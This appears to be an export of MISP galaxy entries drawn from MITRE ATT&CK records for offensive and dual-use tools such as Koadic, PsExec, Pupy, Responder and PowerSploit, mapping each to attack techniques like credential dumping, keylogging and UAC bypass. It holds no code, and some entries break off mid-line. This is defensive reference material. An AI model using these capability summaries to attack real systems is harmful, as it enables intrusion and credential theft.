[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018)

The tag is: `misp-galaxy:mitre-tool="Koadic - S0250"`

**Koadic - S0250 is also known as:**

• Koadic

**Koadic - S0250 has relationships with:**

• uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-
PsExec - S0029

[PsExec](https://attack.mitre.org/software/S0029) is a free Microsoft tool that can be used to execute a program on another computer. It is used by IT administrators and attackers. (Citation: Russinovich Sysinternals) (Citation: SANS PsExec)

The tag is: `misp-galaxy:mitre-tool="PsExec - S0029"`
PsExec - S0029 is also known as:

- PsExec

PsExec - S0029 has relationships with:

- similar: misp-galaxy:tool="PsExec" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

Table 4924. Table References

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<td><a href="https://attack.mitre.org/software/S0029">https://attack.mitre.org/software/S0029</a></td>
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<td><a href="https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive">https://digital-forensics.sans.org/blog/2012/12/17/protecting-privileged-domain-accounts-psexec-deep-dive</a></td>
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Net - S0039

The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)

[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using `<code>net use</code>` commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as `<code>net1 user</code>`.

The tag is: `misp-galaxy:mitre-tool="Net - S0039"

Net - S0039 is also known as:

- Net
- net.exe

Net - S0039 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0039">https://attack.mitre.org/software/S0039</a></td>
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<tr>
<td><a href="http://windowsitpro.com/windows/netexe-reference">http://windowsitpro.com/windows/netexe-reference</a></td>
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</table>

esentutl - S0404

[esentutl](https://attack.mitre.org/software/S0404) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.(Citation: Microsoft Esentutl)

The tag is: misp-galaxy:mitre-tool="esentutl - S0404"
esentutl - S0404 is also known as:

- esentutl
- esentutl.exe

esentutl - S0404 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0404">https://attack.mitre.org/software/S0404</a></td>
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**FlexiSpy - S0408**

[FlexiSpy](https://attack.mitre.org/software/S0408) is sophisticated surveillanceware for iOS and Android. Publicly-available, comprehensive analysis has only been found for the Android version.(Citation: FortiGuard-FlexiSpy)(Citation: CyberMerchants-FlexiSpy)

[FlexiSpy](https://attack.mitre.org/software/S0408) markets itself as a parental control and employee monitoring application.(Citation: FlexiSpy-Website)

The tag is: *misp-galaxy:mitre-tool="FlexiSpy - S0408"*

FlexiSpy - S0408 is also known as:

- FlexiSpy

FlexiSpy - S0408 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Stored Application Data - T1409" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Access Calendar Entries - T1435" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

Table 4927. Table References

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<td><a href="http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html">http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html</a></td>
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<td><a href="https://www.flexispy.com/">https://www.flexispy.com/</a></td>
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Reg - S0075

[Reg](https://attack.mitre.org/software/S0075) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. (Citation: Microsoft Reg)

Utilities such as [Reg](https://attack.mitre.org/software/S0075) are known to be used by persistent threats. (Citation: Windows Commands JPCERT)

The tag is: `misp-galaxy:mite-tool="Reg - S0075"

Reg - S0075 is also known as:

- Reg
- reg.exe

Reg - S0075 has relationships with:

- uses: `misp-galaxy:mite-attack-pattern="Query Registry - T1012"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mite-attack-pattern="Credentials in Registry - T1552.002"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mite-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0075">https://attack.mitre.org/software/S0075</a></td>
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<tr>
<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
</tr>
</tbody>
</table>

Tasklist - S0057

The [Tasklist](https://attack.mitre.org/software/S0057) utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface. (Citation: Microsoft Tasklist)

The tag is: `misp-galaxy:mite-tool="Tasklist - S0057"

Tasklist - S0057 is also known as:

- Tasklist

Tasklist - S0057 has relationships with:

- uses: `misp-galaxy:mite-attack-pattern="System Service Discovery - T1007"` with estimative-
NBTscan - S0590

[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)

The tag is: `misp-galaxy:mitre-tool="NBTscan - S0590"`

NBTscan - S0590 is also known as:

- NBTscan

NBTscan - S0590 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040"` with estimative-language:likelihood-probability="almost-certain"
FTP - S0095

[FTP](https://attack.mitre.org/software/S0095) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data. (Citation: Wikipedia FTP)

The tag is: `misp-galaxy:mitre-tool="FTP - S0095"`

FTP - S0095 is also known as:

- FTP
- ftp.exe

FTP - S0095 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043"` with estimative-language:likelihood-probability="almost-certain"

### Table 4931. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0095">https://attack.mitre.org/software/S0095</a></td>
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</table>

Systeminfo - S0096

[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)

The tag is: `misp-galaxy:mitre-tool="Systeminfo - S0096"

Systeminfo - S0096 is also known as:

- systeminfo.exe
- Systeminfo

Systeminfo - S0096 has relationships with:


### Table 4932. Table References
Ping - S0097

[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)

The tag is: *misp-galaxy:mitre-tool="Ping - S0097"

Ping - S0097 is also known as:

- ping.exe
- Ping

Ping - S0097 has relationships with:


Table 4933. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0097">https://attack.mitre.org/software/S0097</a></td>
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</table>

Arp - S0099

[Arp](https://attack.mitre.org/software/S0099) displays information about a system’s Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp)

The tag is: *misp-galaxy:mitre-tool="Arp - S0099"

Arp - S0099 is also known as:

- Arp
- arp.exe

Arp - S0099 has relationships with:


Table 4934. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0099">https://attack.mitre.org/software/S0099</a></td>
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</tbody>
</table>
schtasks - S0111

[schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)

The tag is: `misp-galaxy:mitre-tool="schtasks - S0111"

schtasks - S0111 is also known as:

- schtasks
- schtasks.exe

schtasks - S0111 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 4935. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0111">https://attack.mitre.org/software/S0111</a></td>
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</table>

Lsslss - S0121

[Lsslss](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. (Citation: Mandiant APT1)

The tag is: `misp-galaxy:mitre-tool="Lsslss - S0121"

Lsslss - S0121 is also known as:

- Lsslss

Lsslss - S0121 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 4936. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0121">https://attack.mitre.org/software/S0121</a></td>
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<td><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></td>
</tr>
</tbody>
</table>

2860
UACMe - S0116

[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)

The tag is: `misp-galaxy:mitre-tool="UACMe - S0116"`

UACMe - S0116 is also known as:

- UACMe

UACMe - S0116 has relationships with:

- similar: `misp-galaxy:malpedia="UACMe"` with `estimative-language:likelihood-probability="likely"

Table 4937. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0116">https://attack.mitre.org/software/S0116</a></td>
</tr>
<tr>
<td><a href="https://github.com/hfiref0x/UACME">https://github.com/hfiref0x/UACME</a></td>
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</table>

Cachedump - S0119

[Cachedump](https://attack.mitre.org/software/S0119) is a publicly-available tool that program extracts cached password hashes from a system's registry. (Citation: Mandiant APT1)

The tag is: `misp-galaxy:mitre-tool="Cachedump - S0119"`

Cachedump - S0119 is also known as:

- Cachedump

Cachedump - S0119 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005"` with `estimative-language:likelihood-probability="almost-certain"

Table 4938. Table References

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<td><a href="https://attack.mitre.org/software/S0119">https://attack.mitre.org/software/S0119</a></td>
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<tr>
<td><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></td>
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</tbody>
</table>
Winexe - S0191

[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. (Citation: Überwachung APT28 Forfiles June 2015)

The tag is: `misp-galaxy:mitre-tool="Winexe - S0191"`

Winexe - S0191 is also known as:

- Winexe

Winexe - S0191 has relationships with:

- similar: `misp-galaxy:tool="Winexe"` with estimative-language:likelihood-probability="likely"

Table 4939. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0191">https://attack.mitre.org/software/S0191</a></td>
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<tr>
<td><a href="https://github.com/skalkoto/winexe/">https://github.com/skalkoto/winexe/</a></td>
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</table>

xCmd - S0123

[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)

The tag is: `misp-galaxy:mitre-tool="xCmd - S0123"`

xCmd - S0123 is also known as:

- xCmd

xCmd - S0123 has relationships with:


Table 4940. Table References

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<td><a href="https://attack.mitre.org/software/S0123">https://attack.mitre.org/software/S0123</a></td>
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2862
BloodHound - S0521

[BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment. (Citation: GitHub Bloodhound) (Citation: CrowdStrike BloodHound April 2018) (Citation: FoxIT Wocao December 2019)

The tag is: `misp-galaxy:mitre-tool="BloodHound - S0521"

BloodHound - S0521 is also known as:

- BloodHound

BloodHound - S0521 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001"` with estimative-language:likelihood-probability="almost-certain"

**Table 4941. Table References**

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<tr>
<td><a href="https://attack.mitre.org/software/S0521">https://attack.mitre.org/software/S0521</a></td>
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</table>
Pupy - S0192

[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy)

[Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)

The tag is: *misp-galaxy:mitre-tool="Pupy - S0192"

Pupy - S0192 is also known as:

- Pupy

Pupy - S0192 has relationships with:

- similar: *misp-galaxy:rat="Pupy"* with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"* with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Systemd Service - T1543.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 4942. Table References

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<td><a href="https://attack.mitre.org/software/S0192">https://attack.mitre.org/software/S0192</a></td>
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<tr>
<td><a href="https://github.com/n1nj4sec/pupy">https://github.com/n1nj4sec/pupy</a></td>
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**MailSniper - S0413**

MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)

The tag is: misp-galaxy:mitre-tool="MailSniper - S0413"

MailSniper - S0413 is also known as:

• MailSniper

MailSniper - S0413 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"

Table 4943. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0413">https://attack.mitre.org/software/S0413</a></td>
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<tr>
<td><a href="https://github.com/dafthack/MailSniper">https://github.com/dafthack/MailSniper</a></td>
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**Expand - S0361**

[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files. (Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content. (Citation: Palo Alto Networks BBSRAT)

The tag is: misp-galaxy:mitre-tool="Expand - S0361"

Expand - S0361 is also known as:

- Expand

Expand - S0361 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 4944. Table References

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<td><a href="https://attack.mitre.org/software/S0361">https://attack.mitre.org/software/S0361</a></td>
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<td><a href="https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand">https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand</a></td>
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</table>

**Tor - S0183**

[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-
**Generation Onion Router**

The tag is: `misp-galaxy:mitre-tool="Tor - S0183"`

Tor - S0183 is also known as:

- Tor

Tor - S0183 has relationships with:


- uses: `misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003"` with estimative-language:likelihood-probability="almost-certain"

**Table 4945. Table References**

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<td><a href="https://attack.mitre.org/software/S0183">https://attack.mitre.org/software/S0183</a></td>
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**Forfiles - S0193**

[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)

The tag is: `misp-galaxy:mitre-tool="Forfiles - S0193"`

Forfiles - S0193 is also known as:

- Forfiles

Forfiles - S0193 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"

**Table 4946. Table References**

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<td><a href="https://attack.mitre.org/software/S0193">https://attack.mitre.org/software/S0193</a></td>
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2868
Out1 - S0594

[Out1](https://attack.mitre.org/software/S0594) is a remote access tool written in python and used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2021.(Citation: Trend Micro Muddy Water March 2021)

The tag is: `misp-galaxy:mitre-tool="Out1 - S0594"`

Out1 - S0594 is also known as:

- Out1

Out1 - S0594 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"

**Table 4947. Table References**

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<td><a href="https://attack.mitre.org/software/S0594">https://attack.mitre.org/software/S0594</a></td>
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</table>

Responder - S0174

Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)

The tag is: `misp-galaxy:mitre-tool="Responder - S0174"`

Responder - S0174 is also known as:

- Responder
Responder - S0174 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"

Table 4948. Table References

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<td><a href="https://attack.mitre.org/software/S0174">https://attack.mitre.org/software/S0174</a></td>
</tr>
<tr>
<td><a href="https://github.com/SpiderLabs/Responder">https://github.com/SpiderLabs/Responder</a></td>
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</table>

PowerSploit - S0194

[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)

The tag is: misp-galaxy:mitre-tool="PowerSploit - S0194"

PowerSploit - S0194 is also known as:

- PowerSploit

PowerSploit - S0194 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
